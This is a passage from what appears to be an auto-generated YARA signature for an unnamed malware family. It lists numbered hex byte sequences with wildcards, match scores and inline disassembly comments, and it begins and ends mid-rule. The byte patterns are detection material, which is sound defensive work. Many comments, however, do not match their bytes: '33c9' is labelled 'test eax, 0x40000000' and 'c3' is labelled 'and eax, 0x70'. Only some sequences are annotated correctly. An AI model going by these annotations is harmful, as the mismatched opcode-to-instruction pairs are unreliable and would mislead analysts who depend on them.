            //   ff15????????         |                     
            //   85c0                 | js                  0x1d

        $sequence_39 = { e8???????? e8???????? e8???????? 33c9 ff15???????? }
            // n = 5, score = 1600
            //   e8????????           |                     
            //   e8????????           |                     
            //   e8????????           |                     
            //   33c9                 | test                eax, 0x40000000
            //   ff15????????         |                     

        $sequence_40 = { e8???????? 4885c0 740b 488bc8 e8???????? 488bf8 }
            // n = 6, score = 1600
            //   e8????????           |                     
            //   4885c0               | dec                 eax
            //   740b                 | cwde                
            //   488bc8               | cmp                 word ptr [eax], dx
            //   e8????????           |                     
            //   488bf8               | je                  0x15

        $sequence_41 = { 57 4883ec20 488be9 4885c9 }
            // n = 4, score = 1600
            //   57                   | mov                 eax, dword ptr [ecx + 0x40]
            //   4883ec20             | dec                 eax
            //   488be9               | mov                 dword ptr [esp + 0x30], eax
            //   4885c9               | dec                 eax

        $sequence_42 = { e8???????? 488be8 4885c0 7449 }
            // n = 4, score = 1600
            //   e8????????           |                     
            //   488be8               | inc                 ecx
            //   4885c0               | call                edx
            //   7449                 | dec                 eax

        $sequence_43 = { 4c8bc7 498bd4 488bce e8???????? }
            // n = 4, score = 1400
            //   4c8bc7               | dec                 esp
            //   498bd4               | mov                 ecx, dword ptr [ecx + 0x28]
            //   488bce               | dec                 esp
            //   e8????????           |                     

        $sequence_44 = { 7605 b857000780 85c0 785b }
            // n = 4, score = 1400
            //   7605                 | add                 eax, 0x10
            //   b857000780           | jmp                 0x2f
            //   85c0                 | and                 eax, 2
            //   785b                 | add                 eax, 2

        $sequence_45 = { 488bd0 488bcf e8???????? bb01000000 }
            // n = 4, score = 1400
            //   488bd0               | mov                 ecx, dword ptr [ecx + 0x28]
            //   488bcf               | dec                 esp
            //   e8????????           |                     
            //   bb01000000           | mov                 eax, dword ptr [ecx + 0x20]

        $sequence_46 = { 83780400 7404 8b4008 c3 }
            // n = 4, score = 1400
            //   83780400             | and                 eax, 0x80000000
            //   7404                 | neg                 eax
            //   8b4008               | sbb                 eax, eax
            //   c3                   | and                 eax, 0x70

        $sequence_47 = { e8???????? 488b4c2430 8bf8 4885c9 }
            // n = 4, score = 1400
            //   e8????????           |                     
            //   488b4c2430           | mov                 eax, dword ptr [ecx + 0x20]
            //   8bf8                 | dec                 eax
            //   4885c9               | mov                 edx, dword ptr [ecx + 0x18]

        $sequence_48 = { 2bc2 d1e8 03c2 c1e806 6bc05f }
            // n = 5, score = 1400
            //   2bc2                 | and                 eax, 0x80000000
            //   d1e8                 | neg                 eax
            //   03c2                 | sbb                 eax, eax
            //   c1e806               | and                 eax, 2
            //   6bc05f               | neg                 eax

        $sequence_49 = { 8b05???????? 85c0 7f0b e8???????? }
            // n = 4, score = 1300
            //   8b05????????         |                     
            //   85c0                 | add                 eax, 0x20
            //   7f0b                 | jmp                 0x42
            //   e8????????           |                     

        $sequence_50 = { d1e9 03ca c1e905 6bc93e }
            // n = 4, score = 1300
            //   d1e9                 | test                eax, eax
            //   03ca                 | js                  0x1f
            //   c1e905               | dec                 eax
            //   6bc93e               | cwde                

        $sequence_51 = { e8???????? 83f801 7411 ba0a000000 }
            // n = 4, score = 1300
            //   e8????????           |                     
            //   83f801               | neg                 eax
            //   7411                 | sbb                 eax, eax
            //   ba0a000000           | and                 eax, 0x20

        $sequence_52 = { e8???????? 488b15???????? 488d4c2420 e8???????? }
            // n = 4, score = 1300
            //   e8????????           |                     
            //   488b15????????       |                     
            //   488d4c2420           | je                  7
            //   e8????????           |                     

        $sequence_53 = { 488bcf e8???????? 8bc3 488b9c2480000000 }
            // n = 4, score = 1300
            //   488bcf               | dec                 eax
            //   e8????????           |                     
            //   8bc3                 | mov                 dword ptr [esp + 0x40], eax
            //   488b9c2480000000     | dec                 eax

        $sequence_54 = { 488b01 488b4910 ffd0 ba01000000 }
            // n = 4, score = 1300
            //   488b01               | dec                 ecx
            //   488b4910             | mov                 esp, ebx
            //   ffd0                 | inc                 ecx
            //   ba01000000           | pop                 edi

        $sequence_55 = { 488bcf e8???????? 85c0 0f45de }
            // n = 4, score = 1300
            //   488bcf               | dec                 ecx
            //   e8????????           |                     
            //   85c0                 | dec                 eax
            //   0f45de               | mov                 edx, edi

        $sequence_56 = { 7405 e8???????? ff15???????? 8bc3 }
            // n = 4, score = 1200
            //   7405                 | jmp                 0x15
            //   e8????????           |                     
            //   ff15????????         |                     
            //   8bc3                 | and                 eax, 0x80000000

        $sequence_57 = { 85c0 741c 3bc1 7213 }
            // n = 4, score = 1200
            // 
            //   741c                 | je                  0x1e
            //   3bc1                 | cmp                 eax, ecx
            //   7213                 | jb                  0x15

        $sequence_58 = { 57 57 ff15???????? 68f4010000 ff15???????? }
            // n = 5, score = 1200
            //   57                   | and                 eax, 0x70
            //   57                   | add                 eax, 0x10
            //   ff15????????         |                     
            //   68f4010000           | jmp                 0x2d
            //   ff15????????         |                     

        $sequence_59 = { 8bc1 66ad 85c0 741c }
            // n = 4, score = 1200
            //   8bc1                 | mov                 eax, ecx
            //   66ad                 | lodsw               ax, word ptr [esi]
            //   85c0                 | test                eax, eax
            //   741c                 | je                  0x1e

        $sequence_60 = { c1e102 2bc1 8b00 894508 }
            // n = 4, score = 1200
            //   c1e102               | shl                 ecx, 2
            //   2bc1                 | sub                 eax, ecx
            //   8b00                 | mov                 eax, dword ptr [eax]
            //   894508               | mov                 dword ptr [ebp + 8], eax

        $sequence_61 = { 03d0 52 ebdc 89450c }
            // n = 4, score = 1200
            //   03d0                 | add                 edx, eax
            //   52                   | push                edx
            //   ebdc                 | jmp                 0xffffffde
            //   89450c               | mov                 dword ptr [ebp + 0xc], eax

        $sequence_62 = { 8b01 59 03d0 52 }
            // n = 4, score = 1200
            //   8b01                 | mov                 eax, dword ptr [ecx]
            //   59                   | pop                 ecx
            //   03d0                 | add                 edx, eax
            //   52                   | push                edx

        $sequence_63 = { 33d2 488b01 ff9020020000 488b4c2440 33d2 488b01 ff9030020000 }
            // n = 7, score = 1200
            //   33d2                 | sbb                 eax, eax
            //   488b01               | and                 eax, 2
            //   ff9020020000         | add                 eax, 2
            //   488b4c2440           | jmp                 0x17
            //   33d2                 | and                 eax, 0x80000000
            //   488b01               | neg                 eax
            //   ff9030020000         | and                 eax, 2

        $sequence_64 = { e8???????? 53 e8???????? 83c404 33db }
            // n = 5, score = 1200
            //   e8????????           |                     
            //   53                   | add                 eax, 0x10
            //   e8????????           |                     
            //   83c404               | jmp                 0x2f
            //   33db                 | sbb                 eax, eax

        $sequence_65 = { 51 68e9fd0000 50 e8???????? }
            // n = 4, score = 1200
            //   51                   | jmp                 0x1e
            //   68e9fd0000           | and                 eax, 0x80000000
            //   50                   | and                 eax, 0x70
            //   e8????????           |                     

        $sequence_66 = { 33d2 488b01 ff90f8010000 488b4c2440 }
            // n = 4, score = 1200
            //   33d2                 | add                 eax, 2
            //   488b01               | jmp                 0x15
            //   ff90f8010000         | and                 eax, 0x80000000
            //   488b4c2440           | neg                 eax

        $sequence_67 = { ff5508 8b5510 8b4a04 ff5508 50 51 50 }
            // n = 7, score = 1100
            //   ff5508               | call                dword ptr [ebp + 8]
            //   8b5510               | mov                 edx, dword ptr [ebp + 0x10]
            //   8b4a04               | mov                 ecx, dword ptr [edx + 4]
            //   ff5508               | call                dword ptr [ebp + 8]
            //   50                   | push                eax
            //   51                   | push                ecx
            //   50                   | push                eax

        $sequence_68 = { 7413 4883c002 48ffc9 75f2 }
            // n = 4, score = 1100
            //   7413                 | neg                 eax
            //   4883c002             | sbb                 eax, eax
            //   48ffc9               | and                 eax, 0x80000000
            //   75f2                 | neg                 eax

        $sequence_69 = { 4533c0 33d2 ff15???????? 4c8bf0 4885c0 }
            // n = 5, score = 1100
            //   4533c0               | add                 eax, 2
            //   33d2                 | jmp                 0x17
            //   ff15????????         |                     
            //   4c8bf0               | and                 eax, 0x80000000
            //   4885c0               | neg                 eax

        $sequence_70 = { 85d2 7912 eb05 ba57000780 }
            // n = 4, score = 1100
            //   85d2                 | dec                 eax
            //   7912                 | test                eax, eax
            //   eb05                 | je                  0x14
            //   ba57000780           | xor                 edx, edx

        $sequence_71 = { 48897c2420 488d7aff 4c8d4c2458 488bd7 ff15???????? 85c0 781b }
            // n = 7, score = 1100
            //   48897c2420           | jmp                 0x12
            //   488d7aff             | and                 eax, 0x80000000
            //   4c8d4c2458           | neg                 eax
            //   488bd7               | sbb                 eax, eax
            //   ff15????????         |                     
            //   85c0                 | and                 eax, 7
            //   781b                 | sbb                 eax, eax

        $sequence_72 = { 488b01 ff9080000000 8bf8 85c0 }
            // n = 4, score = 1100
            //   488b01               | dec                 eax
            //   ff9080000000         | test                edx, edx
            //   8bf8                 | je                  0xb
            //   85c0                 | dec                 eax

        $sequence_73 = { 7406 ff15???????? 4885db 7409 }
            // n = 4, score = 1100
            //   7406                 | mov                 eax, dword ptr [ecx + 0x50]
            //   ff15????????         |                     
            //   4885db               | dec                 esp
            //   7409                 | mov                 edx, dword ptr [ecx]

        $sequence_74 = { 488bd9 488b4920 e8???????? 85c0 }
            // n = 4, score = 1100
            //   488bd9               | mov                 eax, dword ptr [ecx + 0x40]
            //   488b4920             | dec                 eax
            //   e8????????           |                     
            //   85c0                 | mov                 dword ptr [esp + 0x30], eax

        $sequence_75 = { ff15???????? 85c0 781b 4898 483bc7 7714 751b }
            // n = 7, score = 1100
            //   ff15????????         |                     
            //   85c0                 | and                 eax, 2
            //   781b                 | add                 eax, 2
            //   4898                 | jmp                 0x15
            //   483bc7               | and                 eax, 0x80000000
            //   7714                 | neg                 eax
            //   751b                 | add                 eax, 0x10

        $sequence_76 = { 03d0 895510 8b4a04 ff5508 }
            // n = 4, score = 1100
            //   03d0                 | add                 edx, eax
            //   895510               | mov                 dword ptr [ebp + 0x10], edx
            //   8b4a04               | mov                 ecx, dword ptr [edx + 4]
            //   ff5508               | call                dword ptr [ebp + 8]

        $sequence_77 = { 59 ff5508 58 894514 8b5510 }
            // n = 5, score = 1100
            //   59                   | pop                 ecx
            //   ff5508               | call                dword ptr [ebp + 8]
            //   58                   | pop                 eax
            //   894514               | mov                 dword ptr [ebp + 0x14], eax
            //   8b5510               | mov                 edx, dword ptr [ebp + 0x10]

        $sequence_78 = { e8???????? 488bf8 eb02 33ff 488b5310 }
            // n = 5, score = 1000
            //   e8????????           |                     
            //   488bf8               | dec                 esp
            //   eb02                 | mov                 ecx, dword ptr [ecx + 0x28]
            //   33ff                 | dec                 esp
            //   488b5310             | mov                 eax, dword ptr [ecx + 0x20]

        $sequence_79 = { 33d2 ff15???????? 85c0 7909 8bc8 e8???????? eb28 }
            // n = 7, score = 900
            //   33d2                 | add                 eax, 2
            //   ff15????????         |                     
            //   85c0                 | jmp                 0x17
            //   7909                 | add                 eax, 0x20
            //   8bc8                 | jmp                 0x3b
            //   e8????????           |                     
            //   eb28                 | and                 eax, 0x80000000

        $sequence_80 = { 7536 b906000000 8bc1 c3 }
            // n = 4, score = 900
            //   7536                 | sbb                 eax, eax
            //   b906000000           | and                 eax, 7
            //   8bc1                 | test                eax, 0x20000000
            //   c3                   | je                  0x30

        $sequence_81 = { 50 57 e8???????? 85c0 7411 }
            // n = 5, score = 900
            //   50                   | push                eax
            //   57                   | push                edi
            //   e8????????           |                     
            //   85c0                 | test                eax, eax
            //   7411                 | je                  0x13

        $sequence_82 = { 84c0 742e 660f1f440000 3c30 7c22 }
            // n = 5, score = 900
            //   84c0                 | add                 eax, 2
            //   742e                 | jmp                 0x17
            //   660f1f440000         | and                 eax, 0x80000000
            //   3c30                 | neg                 eax
            //   7c22                 | add                 eax, 2

        $sequence_83 = { eb0a 83f802 742b 83f803 }
            // n = 4, score = 900
            //   eb0a                 | and                 eax, 0x80000000
            //   83f802               | neg                 eax
            //   742b                 | sbb                 eax, eax
            //   83f803               | and                 eax, 0x70

        $sequence_84 = { ffd3 50 ff15???????? 8bf0 3bf7 }
            // n = 5, score = 900
            //   ffd3                 | and                 eax, 0x80000000
            //   50                   | test                eax, 0x20000000
            //   ff15????????         |                     
            //   8bf0                 | je                  0x30
            //   3bf7                 | test                eax, 0x40000000

        $sequence_85 = { 488b01 ff9080000000 8bd8 85c0 }
            // n = 4, score = 900
            //   488b01               | add                 eax, 0x10
            //   ff9080000000         | jmp                 0x2f
            //   8bd8                 | test                eax, 0x40000000
            //   85c0                 | je                  0x22

        $sequence_86 = { e8???????? e8???????? 8bd8 85c0 740f 8bc8 }
            // n = 6, score = 900
            //   e8????????           |                     
            //   e8????????           |                     
            //   8bd8                 | neg                 eax
            //   85c0                 | sbb                 eax, eax
            //   740f                 | and                 eax, 0x80000000
            //   8bc8                 | neg                 eax

        $sequence_87 = { ff15???????? 85c0 790f 8bc8 }
            // n = 4, score = 900
            //   ff15????????         |                     
            //   85c0                 | jmp                 0xf
            //   790f                 | and                 eax, 0x80000000
            //   8bc8                 | neg                 eax

        $sequence_88 = { 745b 3bd1 0f8293000000 038e8c000000 }
            // n = 4, score = 900
            //   745b                 | test                eax, 0x40000000
            //   3bd1                 | je                  0x13
            //   0f8293000000         | and                 eax, 0x70
            //   038e8c000000         | add                 eax, 0x10

        $sequence_89 = { 89742428 c744242000001f00 ff15???????? 85c0 7911 8bc8 }
            // n = 6, score = 900
            //   89742428             | and                 eax, 0x70
            //   c744242000001f00     | add                 eax, 0x10
            //   ff15????????         |                     
            //   85c0                 | jmp                 0x2d
            //   7911                 | test                eax, 0x40000000
            //   8bc8                 | je                  0x20

        $sequence_90 = { 4885d2 7442 41b9feffff7f 4c2bca 4c2bc1 }
            // n = 5, score = 800
            //   4885d2               | jne                 0xfd
            //   7442                 | dec                 eax
            //   41b9feffff7f         | mov                 ebx, dword ptr [edi + 0x10]
            //   4c2bca               | xor                 eax, eax
            //   4c2bc1               | dec                 eax

        $sequence_91 = { 4885c0 7428 410fb70408 6685c0 741e }
            // n = 5, score = 800
            //   4885c0               | and                 eax, 0x80000000
            //   7428                 | neg                 eax
            //   410fb70408           | sbb                 eax, eax
            //   6685c0               | and                 eax, 0x20
            //   741e                 | add                 eax, 0x20

        $sequence_92 = { ff7508 e8???????? 8bf8 897df4 }
            // n = 4, score = 800
            //   ff7508               | push                dword ptr [ebp + 8]
            //   e8????????           |                     
            //   8bf8                 | mov                 edi, eax
            //   897df4               | mov                 dword ptr [ebp - 0xc], edi

        $sequence_93 = { eb12 4885c9 750a ba57000780 }
            // n = 4, score = 800
            //   eb12                 | mov                 byte ptr [eax + 3], al
            //   4885c9               | inc                 ecx
            //   750a                 | cmp                 cl, 5
            //   ba57000780           | mov                 dword ptr [esp + 0x28], 1

        $sequence_94 = { ffd0 8bf0 85f6 745d }
            // n = 4, score = 700
            //   ffd0                 | call                eax
            //   8bf0                 | mov                 esi, eax
            //   85f6                 | test                esi, esi
            //   745d                 | je                  0x5f

        $sequence_95 = { 57 6a01 50 ff15???????? 6a00 }
            // n = 5, score = 700
            //   57                   | and                 eax, 0x80000000
            //   6a01                 | and                 eax, 0x70
            //   50                   | add                 eax, 0x10
            //   ff15????????         |                     
            //   6a00                 | jmp                 0x2a

        $sequence_96 = { 8bc7 e8???????? 85c0 0f849f000000 }
            // n = 4, score = 700
            //   8bc7                 | neg                 eax
            //   e8????????           |                     
            //   85c0                 | sbb                 eax, eax
            //   0f849f000000         | and                 eax, 7

        $sequence_97 = { 8bf7 8bd7 fc 8bc1 66ad }
            // n = 5, score = 700
            //   8bf7                 | mov                 eax, dword ptr [ecx + 0x20]
            //   8bd7                 | dec                 eax
            //   fc                   | mov                 edx, dword ptr [ecx + 0x18]
            //   8bc1                 | dec                 eax
            //   66ad                 | mov                 dword ptr [esp + 0x40], eax

        $sequence_98 = { 57 33ff 897df8 897df0 }
            // n = 4, score = 700
            //   57                   | je                  0x1f
            //   33ff                 | and                 eax, 0x80000000
            //   897df8               | neg                 eax
            //   897df0               | neg                 eax

        $sequence_99 = { 50 e2fd 8bc7 57 8bec }
            // n = 5, score = 700
            //   50                   | dec                 eax
            //   e2fd                 | mov                 edx, dword ptr [ecx + 0x18]
            //   8bc7                 | dec                 eax
            //   57                   | mov                 dword ptr [esp + 0x38], eax
            //   8bec                 | dec                 eax

        $sequence_100 = { 33d2 488bc8 ff15???????? 4885c0 }
            // n = 4, score = 700
            //   33d2                 | mov                 dword ptr [esp + 0x30], eax
            //   488bc8               | dec                 eax
            //   ff15????????         |                     
            //   4885c0               | mov                 eax, dword ptr [ecx + 0x38]

        $sequence_101 = { 8bd8 85db 750b 5e }
            // n = 4, score = 700
            //   8bd8                 | mov                 ebx, eax
            //   85db                 | test                ebx, ebx
            //   750b                 | jne                 0xd
            //   5e                   | pop                 esi

        $sequence_102 = { 8b3cb0 6a00 e8???????? 85c0 }
            // n = 4, score = 700
            //   8b3cb0               | mov                 edi, dword ptr [eax + esi*4]
            //   6a00                 | push                0
            //   e8????????           |                     
            //   85c0                 | test                eax, eax

        $sequence_103 = { 33c0 5b 8be5 5d c21000 8b450c }
            // n = 6, score = 700
            //   33c0                 | xor                 eax, eax
            //   5b                   | pop                 ebx
            //   8be5                 | mov                 esp, ebp
            //   5d                   | pop                 ebp
            //   c21000               | ret                 0x10
            //   8b450c               | mov                 eax, dword ptr [ebp + 0xc]

        $sequence_104 = { 3bc1 7213 2bc1 51 8bcf }
            // n = 5, score = 700
            //   3bc1                 | dec                 eax
            //   7213                 | mov                 eax, dword ptr [ecx + 0x38]
            //   2bc1                 | dec                 eax
            //   51                   | mov                 dword ptr [esp + 0x28], eax
            //   8bcf                 | dec                 eax

        $sequence_105 = { 895df0 895dfc 895df8 895dec }
            // n = 4, score = 700
            //   895df0               | je                  0x20
            //   895dfc               | add                 eax, 2
            //   895df8               | jmp                 0xf
            //   895dec               | and                 eax, 0x80000000

        $sequence_106 = { 4533c0 418bd6 ff15???????? 85c0 }
            // n = 4, score = 600
            //   4533c0               | dec                 eax
            //   418bd6               | mov                 eax, dword ptr [ecx + 0x38]
            //   ff15????????         |                     
            //   85c0                 | dec                 eax

        $sequence_107 = { 48895c2408 48896c2410 4889742418 57 4883ec20 0fb732 }
            // n = 6, score = 500
            //   48895c2408           | and                 eax, 0x80000000
            //   48896c2410           | neg                 eax
            //   4889742418           | sbb                 eax, eax
            //   57                   | and                 eax, 0x80000000
            //   4883ec20             | neg                 eax
            //   0fb732               | sbb                 eax, eax

        $sequence_108 = { 488b9c2440010000 4885c9 7406 ff15???????? }
            // n = 4, score = 500
            //   488b9c2440010000     | mov                 dword ptr [esp + 0x28], eax
            //   4885c9               | dec                 esp
            //   7406                 | mov                 eax, dword ptr [ecx + 0x20]
            //   ff15????????         |                     

        $sequence_109 = { 55 57 56 53 4883ec48 31c0 668944243e }
            // n = 7, score = 500
            //   55                   | mov                 eax, dword ptr [ecx + 0x48]
            //   57                   | dec                 eax
            //   56                   | mov                 dword ptr [esp + 0x38], eax
            //   53                   | dec                 eax
            //   4883ec48             | mov                 eax, dword ptr [ecx + 0x40]
            //   31c0                 | dec                 eax
            //   668944243e           | mov                 dword ptr [esp + 0x28], eax

        $sequence_110 = { 488b55e8 4883fa10 7212 48ffc2 41b801000000 }
            // n = 5, score = 500
            //   488b55e8             | je                  0x30
            //   4883fa10             | test                eax, 0x40000000
            //   7212                 | add                 edi, 0x24
            //   48ffc2               | mov                 eax, dword ptr [edi]
            //   41b801000000         | test                eax, 0x20000000

        $sequence_111 = { 83e0df 4409d8 4388040a 4983c101 4983f903 75e7 }
            // n = 6, score = 500
            //   83e0df               | dec                 eax
            //   4409d8               | mov                 eax, dword ptr [ecx + 0x40]
            //   4388040a             | dec                 eax
            //   4983c101             | mov                 dword ptr [esp + 0x30], eax
            //   4983f903             | dec                 eax
            //   75e7                 | mov                 eax, dword ptr [ecx + 0x38]

        $sequence_112 = { 488d4c2420 e8???????? cc 8325????????00 c3 48895c2408 }
            // n = 6, score = 500
            //   488d4c2420           | add                 eax, 0x20
            //   e8????????           |                     
            //   cc                   | jmp                 0x40
            //   8325????????00       |                     
            //   c3                   | and                 eax, 0x80000000
            //   48895c2408           | neg                 eax

        $sequence_113 = { 4d89c5 757a 8b05???????? 85c0 }
            // n = 4, score = 500
            //   4d89c5               | dec                 eax
            //   757a                 | mov                 eax, dword ptr [ecx + 0x48]
            //   8b05????????         |                     
            //   85c0                 | dec                 eax

        $sequence_114 = { ff15???????? 488bce ff15???????? 488bc8 }
            // n = 4, score = 500
            //   ff15????????         |                     
            //   488bce               | dec                 eax
            //   ff15????????         |                     
            //   488bc8               | mov                 edx, dword ptr [ecx + 0x18]

        $sequence_115 = { 85c9 7e32 483bfb 480f4cdf 4885db }
            // n = 5, score = 500
            //   85c9                 | and                 eax, 2
            //   7e32                 | add                 eax, 2
            //   483bfb               | jmp                 0x12
            //   480f4cdf             | and                 eax, 0x80000000
            //   4885db               | neg                 eax

        $sequence_116 = { 488b742438 4883c420 5f 48ffe0 488b5c2430 488b742438 4883c420 }
            // n = 7, score = 500
            //   488b742438           | test                eax, 0x40000000
            //   4883c420             | add                 eax, 2
            //   5f                   | jmp                 0x12
            //   48ffe0               | and                 eax, 0x80000000
            //   488b5c2430           | neg                 eax
            //   488b742438           | sbb                 eax, eax
            //   4883c420             | and                 eax, 0x80000000

        $sequence_117 = { 66837b2000 74cf 89f0 f7ed 89f0 }
            // n = 5, score = 500
            //   66837b2000           | mov                 eax, dword ptr [ecx + 0x20]
            //   74cf                 | dec                 eax
            //   89f0                 | mov                 edx, dword ptr [ecx + 0x18]
            //   f7ed                 | dec                 eax
            //   89f0                 | mov                 dword ptr [esp + 0x40], eax

        $sequence_118 = { 8d50ff 85c0 89560c 7fe6 448b5e08 41f6c380 }
            // n = 6, score = 500
            //   8d50ff               | dec                 eax
            //   85c0                 | mov                 dword ptr [esp + 0x28], eax
            //   89560c               | dec                 esp
            //   7fe6                 | mov                 ecx, dword ptr [ecx + 0x28]
            //   448b5e08             | dec                 esp
            //   41f6c380             | mov                 eax, dword ptr [ecx + 0x20]

        $sequence_119 = { 833d????????02 488b0cd0 48891cd0 48890b }
            // n = 4, score = 500
            //   833d????????02       |                     
            //   488b0cd0             | mov                 dword ptr [esp + 0x38], eax
            //   48891cd0             | dec                 eax
            //   48890b               | mov                 eax, dword ptr [ecx + 0x40]

        $sequence_120 = { 4883ec20 488b05???????? 488bfa 488bf1 4885c0 }
            // n = 5, score = 500
            //   4883ec20             | and                 eax, 0x80000000
            //   488b05????????       |                     
            //   488bfa               | neg                 eax
            //   488bf1               | and                 eax, 2
            //   4885c0               | add                 eax, 2

        $sequence_121 = { 4885c9 740a e8???????? 4885c0 }
            // n = 4, score = 500
            //   4885c9               | mov                 ecx, dword ptr [ecx + 0x28]
            //   740a                 | dec                 esp
            //   e8????????           |                     
            //   4885c0               | mov                 eax, dword ptr [ecx + 0x20]

        $sequence_122 = { 740b 488bd3 498bce e8???????? }
            // n = 4, score = 500
            //   740b                 | lodsw               ax, word ptr [esi]
            //   488bd3               | test                eax, eax
            //   498bce               | je                  0x54
            //   e8????????           |                     

        $sequence_123 = { 480f4cdf 4885db 740b 4c8bc3 }
            // n = 4, score = 500
            //   480f4cdf             | add                 edi, 0x24
            //   4885db               | mov                 eax, dword ptr [edi]
            //   740b                 | test                eax, 0x20000000
            //   4c8bc3               | je                  0x32

        $sequence_124 = { ff15???????? 4531c9 4531c0 31d2 }
            // n = 4, score = 500
            //   ff15????????         |                     
            //   4531c9               | dec                 eax
            //   4531c0               | mov                 edx, edi
            //   31d2                 | dec                 eax

        $sequence_125 = { 488b8b80000000 e8???????? 90 33d2 448d4202 488bcb e8???????? }
            // n = 7, score = 500
            //   488b8b80000000       | je                  0x32
            //   e8????????           |                     
            //   90                   | test                eax, 0x40000000
            //   33d2                 | mov                 dword ptr [ebp - 0xc], ebx
            //   448d4202             | mov                 dword ptr [ebp - 0x14], ebx
            //   488bcb               | mov                 word ptr [ebp - 0x10], 0x500
            //   e8????????           |                     

        $sequence_126 = { 4885c9 7405 e8???????? 4989f0 }
            // n = 4, score = 500
            //   4885c9               | jne                 0x1c
            //   7405                 | dec                 ebp
            //   e8????????           |                     
            //   4989f0               | mov                 eax, esp

        $sequence_127 = { 448944243c e8???????? 448b44243c 83e801 894310 8b4c2458 4989d9 }
            // n = 7, score = 500
            //   448944243c           | dec                 eax
            //   e8????????           |                     
            //   448b44243c           | mov                 dword ptr [esp + 0x30], eax
            //   83e801               | dec                 eax
            //   894310               | mov                 edx, dword ptr [ecx + 0x18]
            //   8b4c2458             | dec                 eax
            //   4989d9               | mov                 dword ptr [esp + 0x38], eax

        $sequence_128 = { 8b38 e8???????? 0fb7d6 4189c0 4889d9 4189f9 }
            // n = 6, score = 500
            //   8b38                 | dec                 eax
            //   e8????????           |                     
            //   0fb7d6               | mov                 edx, dword ptr [ecx + 0x18]
            //   4189c0               | dec                 eax
            //   4889d9               | mov                 dword ptr [esp + 0x40], eax
            //   4189f9               | dec                 eax

        $sequence_129 = { 8b08 eb02 33c9 4863d9 }
            // n = 4, score = 500
            //   8b08                 | and                 eax, 0x80000000
            //   eb02                 | neg                 eax
            //   33c9                 | sbb                 eax, eax
            //   4863d9               | and                 eax, 0x20

        $sequence_130 = { ff15???????? 488bf0 4885c0 0f848e000000 }
            // n = 4, score = 500
            //   ff15????????         |                     
            //   488bf0               | dec                 eax
            //   4885c0               | mov                 dword ptr [esp + 0x28], eax
            //   0f848e000000         | dec                 esp

        $sequence_131 = { 8bec 81ec8c0b0000 53 56 57 33ff }
            // n = 6, score = 500
            //   8bec                 | test                eax, 0x40000000
            //   81ec8c0b0000         | je                  0x1d
            //   53                   | and                 eax, 0x80000000
            //   56                   | neg                 eax
            //   57                   | jmp                 0x38
            //   33ff                 | and                 eax, 0x80000000

        $sequence_132 = { 6a00 ff75e8 ff15???????? ff75e8 }
            // n = 4, score = 500
            //   6a00                 | test                eax, 0x40000000
            //   ff75e8               | neg                 eax
            //   ff15????????         |                     
            //   ff75e8               | sbb                 eax, eax

        $sequence_133 = { 488b4db8 4885c9 7406 488b01 ff5010 }
            // n = 5, score = 400
            //   488b4db8             | add                 eax, 0x20
            //   4885c9               | jmp                 0x3b
            //   7406                 | and                 eax, 0x80000000
            //   488b01               | neg                 eax
            //   ff5010               | and                 eax, 0x70

        $sequence_134 = { 488bc1 eb50 488bcf ff15???????? 448bd8 }
            // n = 5, score = 400
            //   488bc1               | jmp                 0x12
            //   eb50                 | and                 eax, 0x80000000
            //   488bcf               | neg                 eax
            //   ff15????????         |                     
            //   448bd8               | sbb                 eax, eax

        $sequence_135 = { ff15???????? 4885c0 740c 33d2 488bc8 }
            // n = 5, score = 400
            //   ff15????????         |                     
            //   4885c0               | dec                 eax
            //   740c                 | mov                 ecx, dword ptr [ecx + 0x10]
            //   33d2                 | dec                 eax
            //   488bc8               | mov                 dword ptr [esp + 0x20], eax

        $sequence_136 = { 884c1464 48ffc2 4883fa02 72e6 }
            // n = 4, score = 400
            //   884c1464             | je                  0x32
            //   48ffc2               | test                eax, 0x40000000
            //   4883fa02             | je                  0x21
            //   72e6                 | mov                 eax, dword ptr [edi]

        $sequence_137 = { 57 8b7d0c 8bd9 89442410 0fb607 35c59d1c81 8b5314 }
            // n = 7, score = 400
            //   57                   | and                 eax, 2
            //   8b7d0c               | add                 eax, 2
            //   8bd9                 | jmp                 0x19
            //   89442410             | sbb                 eax, eax
            //   0fb607               | and                 eax, 0x70
            //   35c59d1c81           | add                 eax, 0x10
            //   8b5314               | jmp                 0x2f

        $sequence_138 = { 4889f9 e8???????? 4889c3 488b06 }
            // n = 4, score = 400
            //   4889f9               | dec                 eax
            //   e8????????           |                     
            //   4889c3               | lea                 ecx, [esp + 0x20]
            //   488b06               | dec                 eax

        $sequence_139 = { 0fb732 488d7a02 33ed 488bd9 6685f6 }
            // n = 5, score = 400
            //   0fb732               | and                 eax, 0x20
            //   488d7a02             | add                 eax, 0x20
            //   33ed                 | jmp                 0x42
            //   488bd9               | and                 eax, 0x80000000
            //   6685f6               | neg                 eax

        $sequence_140 = { 8915???????? 897e04 8b4704 8938 a1???????? 8b00 }
            // n = 6, score = 400
            //   8915????????         |                     
            //   897e04               | and                 eax, 0x80000000
            //   8b4704               | neg                 eax
            //   8938                 | sbb                 eax, eax
            //   a1????????           |                     
            //   8b00                 | and                 eax, 0x20

        $sequence_141 = { 4889f2 4c89f1 e8???????? 4989c4 }
            // n = 4, score = 400
            //   4889f2               | mov                 ecx, ebx
            //   4c89f1               | dec                 eax
            //   e8????????           |                     
            //   4989c4               | mov                 eax, dword ptr [ebx]

        $sequence_142 = { e8???????? 4889f1 e8???????? 4889c2 }
            // n = 4, score = 400
            //   e8????????           |                     
            //   4889f1               | mov                 ecx, edi
            //   e8????????           |                     
            //   4889c2               | dec                 eax

        $sequence_143 = { 4881c4a8000000 415f 415e 415c 5f }
            // n = 5, score = 400
            //   4881c4a8000000       | and                 eax, 0x20
            //   415f                 | add                 eax, 0x20
            //   415e                 | jmp                 0x3e
            //   415c                 | and                 eax, 0x80000000
            //   5f                   | mov                 eax, dword ptr [edi]

        $sequence_144 = { e8???????? 4889d9 e8???????? 488b03 }
            // n = 4, score = 400
            //   e8????????           |                     
            //   4889d9               | mov                 ebx, eax
            //   e8????????           |                     
            //   488b03               | dec                 eax

        $sequence_145 = { 4889d9 e8???????? 85c0 743a }
            // n = 4, score = 400
            //   4889d9               | mov                 eax, dword ptr [esi]
            //   e8????????           |                     
            //   85c0                 | dec                 eax
            //   743a                 | mov                 ecx, esi

        $sequence_146 = { e8???????? 84db 740e 488b0d???????? }
            // n = 4, score = 400
            //   e8????????           |                     
            //   84db                 | and                 eax, 0x80000000
            //   740e                 | neg                 eax
            //   488b0d????????       |                     

        $sequence_147 = { 83ec08 8b08 8900 a1???????? }
            // n = 4, score = 400
            //   83ec08               | and                 eax, 0x20
